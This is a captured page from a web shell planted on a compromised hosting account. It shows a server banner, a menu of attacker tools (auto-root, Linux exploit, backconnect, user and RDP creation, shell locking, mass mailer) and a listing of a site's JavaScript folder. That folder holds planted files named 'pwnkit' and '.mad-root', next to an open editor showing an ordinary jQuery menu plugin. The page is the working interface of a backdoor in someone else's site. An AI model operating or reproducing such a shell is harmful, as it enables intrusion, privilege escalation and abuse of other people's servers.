Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
templates /
bizone /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
bootstrap.min.js
36.01
KB
-rw----r--
functions.js
4.49
KB
-rw----r--
jPushMenu.js
2.93
KB
-rw----r--
jqSocialSharer.min.js
1.37
KB
-rw----r--
jquery-countTo.js
2.62
KB
-rw----r--
jquery.appear.js
3.26
KB
-rw----r--
jquery.circliful.js
9.4
KB
-rw----r--
jquery.easing.min.js
5.48
KB
-rw----r--
jquery.fancybox-media.js
5.37
KB
-rw----r--
jquery.fancybox-thumbs.js
3.9
KB
-rw----r--
jquery.fancybox.js
49.54
KB
-rw----r--
jquery.mixitup.min.js
27.69
KB
-rw----r--
jquery.parallax-1.1.3.js
1.8
KB
-rw----r--
owl.carousel.min.js
23.38
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
wow.min.js
4.67
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jPushMenu.js
/*! * jPushMenu.js * 1.1.1 * @author: takien * http://takien.com * Original version (pure JS) is created by Mary Lou http://tympanus.net/ */ (function($) { $.fn.jPushMenu = function(customOptions) { var o = $.extend({}, $.fn.jPushMenu.defaultOptions, customOptions); $('body').addClass(o.pushBodyClass); // Add class to toggler $(this).addClass('jPushMenuBtn'); $(this).click(function(e) { e.stopPropagation(); var target = '', push_direction = ''; // Determine menu and push direction if ($(this).is('.' + o.showLeftClass)) { target = '.cbp-spmenu-left'; push_direction = 'toright'; } else if ($(this).is('.' + o.showRightClass)) { target = '.cbp-spmenu-right'; push_direction = 'toleft'; } else if ($(this).is('.' + o.showTopClass)) { target = '.cbp-spmenu-top'; } else if ($(this).is('.' + o.showBottomClass)) { target = '.cbp-spmenu-bottom'; } if (target == '') { return; } $(this).toggleClass(o.activeClass); $(target).toggleClass(o.menuOpenClass); if ($(this).is('.' + o.pushBodyClass) && push_direction != '') { $('body').toggleClass(o.pushBodyClass + '-' + push_direction); } // Disable all other buttons $('.jPushMenuBtn').not($(this)).toggleClass('disabled'); return; }); var jPushMenu = { close: function (o) { $('.jPushMenuBtn,body,.cbp-spmenu') .removeClass('disabled ' + o.activeClass + ' ' + o.menuOpenClass + ' ' + o.pushBodyClass + '-toleft ' + o.pushBodyClass + '-toright'); } } // Close menu on clicking outside menu if (o.closeOnClickOutside) { $(document).click(function() { jPushMenu.close(o); }); } // Close menu on clicking menu link // if (o.closeOnClickLink) { // $('.cbp-spmenu a').on('click',function() { // jPushMenu.close(o); // }); // } }; /* * In case you want to customize class name, * do not directly edit here, use function parameter when call jPushMenu. */ $.fn.jPushMenu.defaultOptions = { pushBodyClass : 'push-body', showLeftClass : 'menu-left', showRightClass : 'menu-right', showTopClass : 'menu-top', showBottomClass : 'menu-bottom', activeClass : 'menu-active', menuOpenClass : 'menu-open', closeOnClickOutside: true, closeOnClickLink : true }; })(jQuery);
Close